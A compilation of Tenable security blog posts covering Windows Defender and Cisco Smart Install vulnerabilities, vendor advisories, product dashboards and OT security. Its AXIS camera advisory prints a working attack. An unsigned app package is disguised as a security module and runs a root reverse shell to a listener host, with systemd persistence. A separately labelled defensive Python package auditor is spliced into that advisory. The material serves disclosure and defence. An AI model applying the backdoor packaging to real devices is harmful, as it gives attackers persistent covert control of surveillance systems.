Channel: Tenable Blog

Microsoft Defends Windows Defender from Remote Code Execution: CVE-2018-0986


Over the years, Microsoft has developed an anti-virus and anti-malware suite of security tools for the Windows environment. However, a critical flaw has recently been found in the Microsoft Malware Protection Engine (mpengine.dll), the core of Windows Defender, affecting every version of Windows and Windows Server that Windows Defender supports.

According to Microsoft, “a remote code execution vulnerability exists when the Microsoft Malware Protection Engine does not properly scan a specially crafted file, leading to memory corruption. An attacker who successfully exploited this vulnerability could execute arbitrary code in the security context of the LocalSystem account and take control of the system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

Impact assessment

By default, Windows Defender’s real-time protection is turned on for all Windows 10 systems. This means the Microsoft Malware Protection Engine (MMPE) scans files automatically, so the vulnerability is triggered as soon as the specially crafted file is scanned. Because the MMPE component automatically scans all incoming files by default, no user interaction is needed to exploit the flaw. If real-time scanning is not enabled, the attacker would need to wait until a scheduled scan occurs for the vulnerability to be exploited. Because the vulnerability affects all Windows products that support Windows Defender, a successful exploit can be used by an attacker to install programs; view, change or delete data; or even create new accounts with full user rights.

Exploitation

Microsoft credited Thomas Dullien, of Google Project Zero, for discovering the vulnerability in his research into Windows Defender and RAR files. In the assessment, Microsoft states, “To exploit this vulnerability, a specially crafted file must be scanned by an affected version of the MMPE.”

There are several ways an attacker may exploit the vulnerability by placing a crafted file in a location scanned by the MMPE:

  • One of the most common ways to exploit this vulnerability is through an email message or Instant Messenger message that is scanned when the file is opened.
  • Attackers can take advantage of websites that host user-provided content by uploading a file to a shared location that would be scanned by MMPE, triggering the exploit.

Urgently required actions

Given the severity, the patch for CVE-2018-0986 is being released a week before Microsoft's regular monthly security update. Typically, administrators and end users do not need to take action for the update to install, because the affected products have built-in tooling for deploying engine updates automatically. The Microsoft update process should install the update within 48 hours. However, given the ease of exploitation, we recommend installing the update as soon as possible.

If a system is not controlled by an enterprise updating system, a user can manually update by simply opening Windows Defender, clicking the update tab and performing the update to trigger the download/installation of the new MMPE. To verify your system has been updated, please compare versions with the chart below.

Identifying affected systems

All Windows Defender supported versions of Windows and Windows Server are affected by this vulnerability.

  • Nessus Plugin ID: 108813 Desc: Microsoft Malware Protection Engine < 1.1.14700.5 RCE



More Visibility into Metrics: Tenable.io Gets New Dashboards


Tenable.io users have been asking for new dashboards to make implementing Cyber Exposure easier, and the Tenable dashboard and reporting teams have delivered. We’ve added five new dashboards to Tenable.io, allowing you to gain more visibility into key topics like vulnerability metrics, risk mitigations and exploit reporting.

These five new dashboards are popular dashboards available in SecurityCenter, now upgraded for the Cyber Exposure Lifecycle. Let’s take a peek:

#1. Executive Summary dashboard


The Executive Summary dashboard takes into account several metrics available in Tenable.io and allows you to narrow the search down to a few key metrics (e.g., severity, Common Vulnerabilities and Exposures [CVE] identifier and vulnerability state). I find this dashboard useful when talking to executives about their Cyber Exposure initiative and measuring their organization's cyber risk.

Executives can easily review and analyze security metrics, taking away a better understanding of the maturity of the Cyber Exposure Lifecycle. As the security director introduces the Cyber Exposure discipline to the organization, they can use this dashboard to measure the modern attack surface to accurately understand and reduce cyber risk. The discipline helps executives to better direct and focus mitigation efforts and report using industry-accepted metrics. Tenable.io facilitates the implementation of the five Cyber Exposure Lifecycle steps and provides a common place for analyzing vulnerability data.

#2. Exploitable Framework Analysis dashboard


When discussing Cyber Exposure with security teams, one key metric is exploitability: how easily a vulnerability can be exploited. The Exploitable Framework Analysis dashboard provides the information needed to predict which assets are most likely to be compromised when attacked.

To further analyze the network, security teams often conduct internal penetration testing. The National Institute of Standards and Technology (NIST) 800-53 control CA-8 Penetration Testing defines penetration testing as “a specialized type of assessment conducted on information systems or individual system components to identify vulnerabilities that could be exploited by adversaries.” To aid in this specialized assessment, security teams use exploitation frameworks such as Core Impact, Canvas and others. This dashboard provides a centralized view of which frameworks most commonly include exploits for the vulnerabilities found in your network.

#3. Measure Vulnerability Management dashboard


When creating the Measure Vulnerability Management dashboard, our goal was to provide a very complete view into the Cyber Exposure discipline progress. We also designed the dashboard to assist the IT security team by organizing the vulnerability management data.

The dashboard follows guidelines outlined in many of the emerging security frameworks. Beginning with a Common Vulnerabilities and Exposures (CVE) matrix, you can easily zero in on vulnerabilities identified by security advisories. Next, a matrix provides several saved searches that help identify hidden vulnerabilities or assist in looking for compromised systems. The dashboard also shows enumerated software, running processes and other sources of system resource usage. Whether you’re part of the server management team or the security team, you’ll benefit from these widgets.

To help the vulnerability management team, there’s useful data about how scans are executed and which operating systems have the most vulnerabilities. When analyzing vulnerabilities by operating system, I often recommend using the plugin family, which allows you to visualize vulnerabilities that often have common support teams and patching cycles. This vulnerability data is then further grouped into escalation columns: CVSS score, exploitability and whether a patch is available. Lastly, if you’ve accepted or recast vulnerabilities, this dashboard provides information to help you monitor risk acceptance.

#4. Mitigation Summary dashboard


The Mitigation Summary dashboard helps illustrate Cyber Exposure progress to management and show the work remaining. Each widget in this dashboard has five columns: The first uses the vulnerability state tag to provide a list of vulnerabilities that have been fixed. The remaining columns provide insight into the remaining work. Each matrix focuses on a different aspect of Cyber Exposure.

Using the CVSS base score helps risk managers perform a quantitative analysis by rating each vulnerability with a computed score. Another metric I find useful for discussing Cyber Exposure with auditors is CVE. This dashboard provides an easy way to see how many CVEs have been mitigated and how many remain outstanding. Finally, grouping vulnerabilities by operating system is helpful when looking at patch management and change control operations. This information allows you to monitor the progress of patch deployment as numbers move from the unmitigated column on the right to the mitigated column.

#5. Security Management Summary dashboard


The Security Management Summary dashboard is used primarily to identify the vulnerabilities and cyber risk that need to be mitigated. When using this dashboard, I can easily view the Transmission Control Protocol (TCP) ports found on the network. Using the native drill-down features, I can easily identify all the vulnerabilities associated with each port.

The dashboard also shows me the most prevalent vulnerabilities by CVE. The CVEs in this dashboard can easily be prioritized and mitigated. I use this dashboard to identify the common operating systems and the Linux and Windows hosts most at risk. In a nutshell, this dashboard helps you prioritize risk mitigation efforts.

Wrapping up

Tenable.io contains a wealth of data to help managers, security teams and executives understand and minimize the cyber risk within your organization. These dashboards provide a more centralized view of several useful metrics, such as mitigated vulnerabilities, CVSS Scores, CVE and many others. By using this technology, your company can be successful in identifying and mitigating cyber risk.


Choosing an OT Security Solution? Here Are the 7 Questions to Ask


Look before you leap is excellent advice for security leaders to heed before they select security solutions to reduce Cyber Exposure in Operational Technology (OT) environments. And, who is better qualified to deliver that advice than Gartner?

Gartner recently published a research note, 7 Questions SRM Leaders Aren’t Asking OT Security Providers During Technology Selection, to help you define important requirements for OT security that you might have overlooked. I’ll outline how Tenable Industrial Security can help you address each question Gartner asks in the research report.

#1. “Is the solution vendor-agnostic?”*

Supporting a variety of Industrial Control System (ICS) assets requires an understanding of a variety of protocols. Tenable Industrial Security monitors a wide variety of protocols commonly used by OT devices, including BACnet, CIP, DNP3, Ethernet/IP, ICCP, IEC 60870-5-104, IEC 61850, IEEE C37.118, Modbus/TCP, OPC, openSCADA, PROFINET, Siemens S7 and more.

However, protocol support is just the start – support for your specific OT devices is also required. Industrial Security supports systems from dozens of manufacturers, including Siemens, ABB, Emerson, GE, Honeywell, Rockwell/Allen-Bradley and Schneider Electric. Additionally, Tenable commonly works with customers to add support for specific devices, as needed.

#2. “Does the solution provide asset discovery to enable operational continuity and system integrity?”*

Asset discovery is core to virtually all OT compliance requirements and best practices. Asset discovery is challenging in IT environments. It’s even more difficult in OT environments because actively scanning OT networks can disrupt or degrade operations. Therefore, Gartner recommends, “Ensure the solution passively scans and analyzes industrial network communications, provides information about network assets, provides advanced anomaly detection, and alerts in real time for any threat to operational continuity and system integrity.”*

Industrial Security includes Nessus Network Monitor passive sensors, which safely and continuously monitor OT networks to detect and identify assets active on the network. They detect new assets added to the network, passively determine the operating system and display machine-to-machine connections.

#3. “Does the solution detect and alert on known common vulnerabilities and exposures?”*

Gartner’s research note says, “A platform that incorporates known CVE discovery into the security policy will provide faster detection, as well as provide value from Day 1 of its deployment.”* Industrial Security’s patented vulnerability analysis technology identifies vulnerabilities in sensitive OT systems that cannot be actively scanned due to the risk of disruption or performance impact. Reports present the vulnerability information in a variety of formats, and alerts for critical vulnerabilities can be sent to SIEMs.

#4. “Can the solution evolve from mirror-mode to in-line security?”*

Gartner states, “SRM leaders in many industries will typically prefer to deploy their OT security systems in passive, detection-only mode (mirror-mode), while disabling active preventive capabilities, as older PLCs will stop working when any unexpected traffic touches them. This is a sensible starting point, which reduces the risk of unplanned impact on the operational technology network. However, in certain industrial control systems, as these leaders gain trust with their solution configuration, they will often want to evolve to in-line deployment, which provides some level of active prevention.”* This evolution allows you to increase the depth of detection and analysis where it makes sense.

In addition to Industrial Security’s passive detection and analysis, Tenable.io Vulnerability Management offers both active scanning and agents for use with IT-based and other robust assets deployed in OT environments. You can easily evolve your approach as you gain confidence.

#5. “Does your solution provide IT support in addition to OT?”*

Gartner states that, “Most OT attacks in the last 10 years started at the more accessible IT network. Security vendors that provide both IT and OT detection may detect an attack at earlier stages, before it enters the OT network, allowing more time to respond and remediate. Obviously, the solutions under consideration must support unique OT security needs, such as protecting OT protocols, supplier remote access to OT equipment and deep packet inspection (DPI). But in addition to OT detection, IT detection, monitoring, and visibility capabilities must be supported as well.”*

Tenable understands that interconnected OT and IT systems cannot be secured in isolation. Our solutions span Industrial-IoT/ICS/SCADA, the cloud and traditional IT, including network devices.

#6. “Does your solution support secure IT/OT alignment?”*

This question addresses the trend to use IT infrastructure in OT architecture layers and the potential risk of using IT security practices and technology that may not be well-suited to OT.

Tenable understands that active security technologies appropriate for IT environments may disrupt and/or degrade performance in OT environments. We’ve provided both active and passive technologies for more than 10 years, and the passive technology understands OT-related protocols.

#7. “Is the solution designed to live in an OT environment from a hardware or operating environment perspective?”*

Industrial Security can be installed on your choice of hardware, including rugged servers designed to operate in harsh conditions. Industrial Security implementations are configurable to meet your network and physical architecture requirements. For example, you can install Industrial Security at each of multiple sub-stations and roll up the results to a master instance for overall visibility.

Please take 10 minutes to read a complimentary copy of Gartner’s research note, 7 Questions SRM Leaders Aren’t Asking OT Security Providers During Technology Selection. If you’d like to discuss your OT security needs, contact us now.


*Gartner, “7 Questions SRM Leaders Aren't Asking OT Security Providers During Technology Selection,” Saniye Burcu Alaybeyi, 11 January 2018.

Cisco Smart Install - How to Prevent Attacks on Switches


There’s been a flurry of activity around the Cisco Smart Install feature recently. Last week, we posted a tech blog about CVE-2018-0171, a critical vulnerability in Cisco’s Smart Install feature that called for immediate mitigation because proof-of-concept code had been released publicly. Now, a wave of attacks has moved through data centers across the internet, targeting Cisco switches with Smart Install enabled in countries across the globe. This time around, attackers are (mis)using the Smart Install protocol with malicious intent against Cisco switches that expose Smart Install. Once an attacker gains access, they rewrite the Cisco IOS image on the switch and change the configuration file. One such attack leaves the message “Do not mess with our elections” as the banner. The switch then becomes unavailable.

Impact assessment

According to Cisco Talos, more than 168,000 devices found on Shodan have this vulnerability. The rate at which Cisco switches are being taken down isn’t known at this time. But the loss of a switch can have a small to enormous impact on a data center, depending on the network architecture. Cisco switches used for internet connectivity will cause lost connectivity if they’re taken down. Any business that hasn’t mitigated its switches could experience a loss of connectivity affecting sales, productivity or customer interaction.

Exploitation

According to Cisco, “The Cisco Smart Install protocol can be abused to modify the Trivial File Transfer Protocol (TFTP) server setting, exfiltrate configuration files via TFTP, modify the configuration file, replace the IOS image, and set up accounts, allowing for the execution of IOS commands. Although this is not a vulnerability in the classic sense, the misuse of this protocol is an attack vector that should be mitigated immediately.”

Cisco released an advisory on the security of Smart Install last year and reiterated their advice last week.

Urgently required actions

Cisco and Tenable suggest immediate mitigation of Cisco switches by:

  • Limiting access through an Access Control List
  • Limiting access to TCP port 4786
  • Disabling the Smart Install Client on the switch


Tenable Research Advisory: AXIS Camera App Malicious Package Distribution Weakness


Tenable Research recently audited an AXIS M3044-V network camera and learned that AXIS has introduced an application platform to their cameras. The camera even came with an app pre-installed: AXIS Video Motion Detection. During the audit, we discovered that it’s possible for a malicious actor to tamper with the firmware and replace it with a malicious package.

What do you need to know? Tenable Research has discovered that the underlying operating system used in the AXIS M3044-V Network Camera can be tampered with and replaced with a malicious package.

What's the attack vector? Using the AXIS Camera Application Platform, a hostile party can create and install an unsigned application package. This requires authenticated access, but once a malicious actor obtains it through social engineering or the supply chain, they’ll have full root access to the device.

What's the business impact? A malicious package can be used to distribute malware to legitimate users or as a pivot point for lateral movement. Physical security and CCTV operations can also be compromised.

What's the solution? There is currently no vendor-supplied solution. All currently sold AXIS cameras support the installation of third-party packages. Tenable recommends deploying affected devices in segmented networks and restricting access to approved users.

Background

The AXIS M3044-V is a networked mini dome surveillance camera marketed to stores, hotels, schools, banks and offices for physical security and CCTV.

The AXIS Camera Application Platform (ACAP) is an open application platform that enables third-party developers to develop applications that can be installed on AXIS network cameras and video encoders.

From an attacker’s perspective, an application platform on an embedded device is interesting because it could make distributing and installing malware easy. Creating custom malicious firmware can be time-consuming and difficult. Furthermore, many embedded systems require digitally signed firmware which, to say the least, presents the attacker with a real challenge. You might be thinking that a well-written application platform would also require signed apps. Let’s see what AXIS did.


Analysis

The first thing we need to know is the format AXIS expects for an app. From the image below, you can see that the camera is expecting the application to have an eap extension.


Thankfully, since the camera comes with an application pre-installed, you can find an eap file in the firmware. An eap turns out to be just a gzip-compressed tar.

albinolobster@ubuntu:~/_M3044-V_8_10_1.bin.extracted$ find . | grep eap
./ubifs-root/usr/share/packages/AXIS_Video_Motion_Detection_4_2_0_armv7hf.eap
albinolobster@ubuntu:~/_M3044-V_8_10_1.bin.extracted$ file ./ubifs-root/usr/share/packages/AXIS_Video_Motion_Detection_4_2_0_armv7hf.eap
./ubifs-root/usr/share/packages/AXIS_Video_Motion_Detection_4_2_0_armv7hf.eap: gzip compressed data, last modified: Tue Dec 19 15:24:07 2017, from Unix


When decompressed, the package reveals a fairly simple format: a binary, a couple of configuration files and some HTML.

albinolobster@ubuntu:~/_M3044-V_8_10_1.bin.extracted/decomp_eap$ ls -l
total 468
-rw-r--r-- 1 albinolobster albinolobster     27 Dec 19 10:15 cgi.txt
drwxr-xr-x 6 albinolobster albinolobster   4096 Dec 19 10:22 html
-rw-r--r-- 1 albinolobster albinolobster    585 Dec 19 10:24 package.conf
-rw-r--r-- 1 albinolobster albinolobster      0 Dec 19 10:15 param.conf
-rwxr-xr-x 1 albinolobster albinolobster 465972 Dec 19 10:24 vmd
albinolobster@ubuntu:~/_M3044-V_8_10_1.bin.extracted/decomp_eap$ file vmd
vmd: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-armhf.so.3, for GNU/Linux 3.10.0, stripped


The package.conf file appears to contain all the instructions for installing and executing the vmd binary.

albinolobster@ubuntu:~/_M3044-V_8_10_1.bin.extracted/decomp_eap$ cat package.conf
PACKAGENAME="AXIS Video Motion Detection"
MENUNAME="Motion Detection"
APPTYPE="armv7hf"
APPNAME="vmd"
APPID="143440"
LICENSEPAGE="none"
VENDOR="Axis Communications"
REQEMBDEVVERSION="2.12"
APPMAJORVERSION="4"
APPMINORVERSION="2"
APPMICROVERSION="0"
APPGRP="sdk"
APPUSR="sdk"
APPOPTS=""
OTHERFILES=""
SETTINGSPAGEFILE="config.html"
SETTINGSPAGETEXT="AXIS Video Motion Detection settings"
VENDORHOMEPAGELINK='<a href="http://www.axis.com" target="_blank">www.axis.com</a>'
POSTINSTALLSCRIPT=""
STARTMODE="respawn"
HTTPCGIPATHS="cgi.txt"
CERTSETNAME=""
CERTSETACTOR=""
CERTSETPROTOCOL=""

The obvious approach to creating our custom application is to simply replace vmd with our own binary. Pursuant to that goal, I generated a little endian ARM reverse shell using msfvenom to replace vmd. I recompressed the package and tried to upload it. Unfortunately, I received an “It did not work!” error message. Could the application be signed in some way? Maybe there’s an API the binary needs to adhere to?

Before racing down those rabbit holes, let’s look at the POSTINSTALLSCRIPT field in package.conf. That sounds like it’ll execute a script of our choosing, right? To test this, I restored the vmd binary to its original state, renamed my reverse shell to rev_shell.bin, created a bash script called rev_shell.sh to execute the reverse shell and changed the package.conf file to include POSTINSTALLSCRIPT="rev_shell.sh".

After repackaging the eap and uploading, I received this:

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.222:1270
[*] Command shell session 15 opened (192.168.1.222:1270 -> 192.168.1.183:46518) at 2018-01-29 09:39:35 -0500

id
uid=0(root) gid=0(root)

It appears we don’t have to worry about any type of package signing. Also worth noting: we overwrote the original VMD install. Pretty neat! The problem now is that our reverse shell only starts after installation, which means any reboot will remove our connection to the camera. Also, since we overwrote VMD, a future update could remove our modifications. Let’s see if we can craft our own application to work around these things.

Since this isn’t an attempt to be stealthy, the first step to avoid being overwritten by future updates is to create our own application. This is easily done by changing a couple of items in the configuration file. Since our goal is to have our application installed by unwitting third parties (or not removed if we have some sort of supply-chain attack going on), we’ll name our application “AXIS IoT Security Module” and rename vmd appropriately:

PACKAGENAME="AXIS IoT Security Module"
MENUNAME="IoT Security"
APPTYPE="armv7hf"
APPNAME="iot_security"
APPID="143441"
LICENSEPAGE="none"
VENDOR="Axis Communications"
REQEMBDEVVERSION="2.12"
APPMAJORVERSION="1"
APPMINORVERSION="0"
APPMICROVERSION="0"


The other half of our problem is persistence. Again, since stealth isn’t a goal, you can just use systemd like the rest of the system does. Rename the reverse shell to security_daemon and create the following service file:

[Unit]
Description=iot_security_daemon
After=httpd.service

[Service]
Type=simple
ExecStart=/usr/local/packages/iot_security/security_daemon
Restart=always

[Install]
WantedBy=multi-user.target

Next, update the post install script to register the reverse shell with systemd:

#!/bin/sh

cp /usr/local/packages/iot_security/iot_security_daemon.service /etc/systemd/system/ &&
systemctl daemon-reload &&
systemctl enable iot_security_daemon.service &&
systemctl start iot_security_daemon.service

And you’re good to go. Repackage all the files into an eap and, once again, you’ll get a reverse shell. And now the shell will come back up if the camera gets rebooted or there’s a firmware update. However, note that the reverse shell won’t survive a factory reset.
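Added example, not part of Tenable's advisory or any AXIS tooling: a Python audit of an .eap (the gzip-compressed tar layout shown above) that flags exactly what the walkthrough relies on, a non-empty POSTINSTALLSCRIPT, a bundled systemd unit and a second executable, and compares the APPNAME binary against an allowlist of known-good hashes. The sample packages, file names, severities and allowlist are constructed assumptions for this example; the binaries are filler bytes, not real programs.

```python
"""Audit an AXIS ACAP .eap package before it is installed on a camera.

Added example for the advisory above, not Tenable's or AXIS's code. The layout
(gzip-compressed tar holding package.conf, the APPNAME binary and extra files)
follows the advisory's listings; the checks and allowlist are assumptions."""
import hashlib
import io
import os
import tarfile
from typing import Dict, List, Tuple

# Filler bytes standing in for the camera's real vmd ELF binary (constructed).
VMD_STUB = b"\x7fELF" + b"\x00" * 60
# Constructed allowlist: APPNAME -> expected SHA-256 of its binary. The advisory
# notes that published checksums alone are no substitute for package signing.
KNOWN_GOOD_SHA256 = {"vmd": hashlib.sha256(VMD_STUB).hexdigest()}


def parse_package_conf(text: str) -> Dict[str, str]:
    """Parse KEY="value" (or KEY='value') lines; blanks and comments are skipped."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        conf[key.strip()] = value
    return conf


def audit_eap(eap_bytes: bytes) -> List[Tuple[str, str]]:
    """Unpack an .eap in memory and return (severity, message) findings."""
    findings: List[Tuple[str, str]] = []
    files: Dict[str, Tuple[bytes, int]] = {}  # name -> (contents, mode bits)
    with tarfile.open(fileobj=io.BytesIO(eap_bytes), mode="r:gz") as tar:
        for m in tar.getmembers():
            name = os.path.normpath(m.name)
            if os.path.isabs(name) or name.startswith(".."):
                findings.append(("HIGH", f"unsafe member path: {m.name}"))
            elif m.isfile():
                files[name] = (tar.extractfile(m).read(), m.mode)
    if "package.conf" not in files:
        findings.append(("HIGH", "package.conf missing; installer behaviour unknown"))
        return findings
    conf = parse_package_conf(files["package.conf"][0].decode("utf-8", "replace"))
    appname = conf.get("APPNAME", "")
    script = conf.get("POSTINSTALLSCRIPT", "")
    # 1. The post-install script runs whatever the packager chose (as root,
    #    per the advisory) the moment the package is installed.
    if script:
        where = "executes at install time" if script in files else "is not in the package"
        findings.append(("HIGH", f"POSTINSTALLSCRIPT={script} {where}"))
    # 2. A bundled systemd unit is a persistence mechanism, not an app asset.
    for name in files:
        if name.endswith(".service"):
            findings.append(("MEDIUM", f"systemd unit {name} bundled (persistence)"))
    # 3. Executables other than the declared APPNAME binary and the script.
    for name, (_, mode) in files.items():
        if mode & 0o111 and name not in (appname, script):
            findings.append(("MEDIUM", f"extra executable {name}"))
    # 4. The main binary must exist and, when allowlisted, match its hash.
    if appname not in files:
        findings.append(("HIGH", f"APPNAME={appname!r} binary not present"))
    elif appname not in KNOWN_GOOD_SHA256:
        findings.append(("INFO", f"{appname} not in allowlist; review manually"))
    elif KNOWN_GOOD_SHA256[appname] != hashlib.sha256(files[appname][0]).hexdigest():
        findings.append(("HIGH", f"{appname} sha256 does not match allowlist"))
    return findings


def build_eap(entries: Dict[str, Tuple[bytes, int]]) -> bytes:
    """Create a gzip-compressed tar (the .eap layout) from in-memory files."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, (data, mode) in entries.items():
            info = tarfile.TarInfo(name=name)
            info.size, info.mode = len(data), mode
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample modelled on the advisory's walkthrough: a renamed app, a
# second executable, a unit file and a post-install script that registers it.
SUSPICIOUS_EAP = build_eap({
    "package.conf": (b'APPNAME="iot_security"\nAPPID="143441"\n'
                     b'POSTINSTALLSCRIPT="postinstall.sh"\nSTARTMODE="respawn"\n', 0o644),
    "iot_security": (VMD_STUB, 0o755),
    "security_daemon": (b"\x7fELF" + b"\x01" * 60, 0o755),
    "iot_security_daemon.service": (b"[Service]\nExecStart=/usr/local/packages/"
                                    b"iot_security/security_daemon\n", 0o644),
    "postinstall.sh": (b"#!/bin/sh\nsystemctl enable iot_security_daemon.service\n", 0o755),
})
# Constructed sample shaped like the stock package listed in the advisory.
CLEAN_EAP = build_eap({
    "package.conf": (b'APPNAME="vmd"\nPOSTINSTALLSCRIPT=""\nHTTPCGIPATHS="cgi.txt"\n', 0o644),
    "vmd": (VMD_STUB, 0o755),
})

if __name__ == "__main__":
    for label, pkg in (("suspicious", SUSPICIOUS_EAP), ("clean", CLEAN_EAP)):
        print(f"== {label} ==", *[f"[{s}] {m}" for s, m in audit_eap(pkg)], sep="\n")
```

Run as a script it reports four findings for the suspicious package and none for the clean one; point audit_eap at the bytes of a real .eap to review a package before approving it for a camera.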


Vendor response

Following our Responsible Disclosure policy, we originally reported these and other findings to AXIS in late August 2017. After some discussion, their final statement was the following:

Regarding the ACAP security issue, all the points you make are valid, and not completely unfeasible in today's world of scams, dodgy app sites and phishers. Though after some internal discussions, the current stance on the ACAP issue is that we will not publish an advisory on this. The majority of the developers of the SDK understand these limitations, and unlike the other issues, there is no easy solution to the problem without breaking compatibility. (Aside from publishing SHA256 checksums on all download links which, as you point out, is not enough). We plan to address this in the next generation of our ACAP platform which will have provision for signing ACAPs. If you feel strongly otherwise please let us know. AXIS ACAPs (as of now) do not have the same widespread distribution that, for example, the Play/App stores have, but yes, I couldn't agree more that signing is an essential improvement we need to implement in future versions.

Business impact

A malicious package installed on the camera can be used to distribute malware to legitimate users or as a pivot point for lateral movement. Physical security and CCTV operations can also be compromised.

Solution

While Tenable currently doesn’t offer a plugin that directly checks for tampered firmware, our AXIS web interface detection plugin will help customers to identify deployed AXIS cameras to determine their exposure to this kind of attack.


Tenable recommends that affected devices are deployed in segmented networks with access and authentication control to restrict usage to approved users.



Tenable Research: February and March Vulnerability Disclosure Roundup


Tenable Research has a dedicated team that performs vulnerability research on software and hardware from third-party vendors. The goal is to discover zero-day vulnerabilities and work with vendors to get them addressed before hackers discover and exploit them.

This post provides an overview of all the vulnerabilities discovered by Tenable Research in February and March.

You can access all Tenable Research advisories here.

EMC VASA Virtual Appliance Default Credentials and Arbitrary File Upload

CVE ID: CVE-2018-1216, CVE-2018-1215

Nessus Plugin ID: 106849

Tenable Research Advisory: TRA-2018-03

Risk Factor: Critical

What do you need to know?

Tenable Research has discovered two vulnerabilities in the EMC VASA Virtual Appliance SE web application. The first vulnerability is a default account. The default account does not have access to the web UI, but exploitation permits an attacker to obtain a valid session ID to execute further commands. The second vulnerability permits an authenticated attacker to upload an arbitrary file to any location on the web server.

What’s the attack vector?

Exploitation of the default credentials requires only unauthenticated network access. Even though the default credentials do not have privileges for the web UI, after authenticating, the attacker can extract a valid session ID from a local cookie and use it to execute remote commands.

What’s the business impact?

Combining both vulnerabilities can permit an attacker to gain full unauthorized access to the system.

What’s the solution?

EMC has released a software update and advisory. Affected users must apply the patch as soon as possible. Tenable customers can assess the vulnerabilities using Plugin ID 106849.



Micro Focus Operations Orchestration Information Disclosure and Remote Denial-of-Service Vulnerabilities

CVE ID: CVE-2018-6490

Nessus Plugin ID: 107094

Tenable Research Advisory: TRA-2018-05

Risk Factor: High

What do you need to know?

Tenable Research has discovered information disclosure and denial-of-service vulnerabilities in Micro Focus Operations Orchestration version 10.X. These can be used to disclose sensitive runtime information and shut down the JMiniX JMX console used for administrative web-based access. You can read a full analysis here.

What's the attack vector?

Exploitation requires only unauthenticated remote network access and is trivial.

What's the business impact?

Malicious attackers can gather sensitive runtime information for reconnaissance. Even worse, a malicious attacker can remotely shut down the JMiniX JMX console that provides access to the web user interface. Micro Focus Operations Orchestration is used by IT and DevOps operation teams to automate IT processes (e.g., incident and disaster recovery and hybrid cloud provisioning and configuration).

What's the solution?

Micro Focus has released a software update and advisory. Affected users must apply the patch as soon as possible. Tenable customers can assess the vulnerability using Plugin ID 107094.



Check Point Gaia OS Privilege Escalation Vulnerability

CVE ID: -

Nessus Plugin ID: 107072

Tenable Research Advisory: TRA-2018-04

Risk Factor: Medium

What do you need to know?

Tenable Research has discovered a Privilege Escalation vulnerability in Check Point’s Gaia OS, versions R77.20, R77.30 and R80.10, deployed on Check Point’s Security Gateway, Security Management and Scalable Platforms Appliances. The vulnerability can be used by a malicious user to execute arbitrary bash shell commands.

What’s the attack vector?

Exploitation requires an authenticated user session. Arbitrary bash shell commands can be executed with the proper formatting despite a restricted shell.

What’s the business impact?

The business impact is considered Low. Exploitation requires a malicious insider, or the theft or phishing of credentials. Arbitrary commands require careful crafting to execute successfully.

What’s the solution?

Check Point has released a software update and advisory. Affected users should apply the patch as soon as possible. Tenable customers can assess the vulnerability using Plugin ID 107072.



CVE ID: CVE-2018-0172, CVE-2018-0173, CVE-2018-0174

Nessus Plugin ID: -

Tenable Research Advisory: TRA-2018-06

Risk Factor: High

What do you need to know?

Tenable Research has discovered denial-of-service vulnerabilities in the DHCP relay agent in Cisco’s IOS and IOS-XE operating systems.

What's the attack vector?

The attacks are performed by sending malicious DHCP requests to the relay agent on the router.

What's the business impact?

The business impact is medium. An attacker could use this attack to stop clients from obtaining IP addresses.

What's the solution?

Cisco has released software updates and an advisory for each vulnerability (see below). Affected users should patch their systems as soon as possible.

Putting the S.M.A.R.T. in Smart Cities: How to Address the Expanding Attack Surface


The concept of a smart city came of age in conjunction with another now ubiquitous term: digital transformation. Cities and counties rely heavily on their taxing authority to provide critical services such as public safety, public works and infrastructure maintenance. By using the latest IP-enabled technology, local jurisdictions, or smart cities, can improve the efficiency of service delivery, freeing up revenues to support additional – or enhanced – services to their residents.

Smart cities: New opportunities for service delivery, new vectors for risk

As great as this concept sounds, it’s already experienced some headwind as various initiatives get closer to being operational, with none more significant than the maintenance of cyber hygiene and integrity of information security.

Smart cities have fundamentally outkicked their coverage on information security as they’ve adopted their digital transformation plans. Digitizing local services has expanded the attack surface, potentially creating greater liability than the benefits offered from their adoption. IT departments are focused on maintaining uptime for users as well as gathering and analyzing the data that drives effective provisioning of services. Digital transformation of smart cities will spread the local IT shops very thin by adding new projects that must be completed concurrent to the smart city initiatives. The adoption of cloud computing strategies and the integration of large numbers of IoT devices are among the list of projects they’ll need to tackle.

Many cities are moving to cloud computing to deal more efficiently with the deluge of data necessary to manage smart city initiatives. This will expand the cyber attack surface beyond the usual confines of the local IT world. Adding smart devices such as refuse containers, streetlights and parking meters will add a plethora of new IoT integration challenges. Finally, municipally owned utilities will create an integration of IT and operational technology (OT) that may be well beyond IT’s current capabilities.

Modern attack surface

So, is this expanding attack surface a mystery to local IT departments? Nope, and it’s not a mystery to the black-hat hackers who want to disrupt local services and perhaps siphon off the benefits of these services undetected. Say a city-owned utility utilizes a number of IoT devices to manage the distribution of power or water to local residents. Being able to manipulate those IoT devices to provide more or less of those services to certain residents could be of tremendous financial value to a threat actor. And the truth is, this activity could go undetected for an extended period of time without the introduction of an enhanced – and coordinated – Cyber Exposure capability.  

How can smart cities address the expanding attack surface?

Smart cities can ensure they’re addressing this expanded cyber attack surface by creating a set of S.M.A.R.T. information security goals to go along with their digital transformation goals:  

Specific – Ensure each smart city digital transformation initiative has a specific Cyber Exposure corollary. For example, if introducing digital waste disposal systems is a smart city goal, ensure both the IoT devices and software that manages them are actively and passively scanned, as appropriate. In other words, don’t “outkick the coverage” and implement an initiative without addressing the potential vulnerabilities it may present.  

Measurable – Information security standards apply to the expansion of smart city initiatives. Ensure a process is in place to automate the reporting of known vulnerabilities and their threat level. And make this information available to the executive suite via clear, concise dashboard reporting.

Attainable – Although smart city digital transformation has great promise, it also gives threat actors a wider set of potential targets. Cities and counties should be very deliberate about how they bring initiatives online, so the benefits are attainable without a corresponding increase in potential liabilities due to expanding the attack surface too quickly. The public will appreciate the benefit over time, but will damn the risks immediately if there’s a breach.  

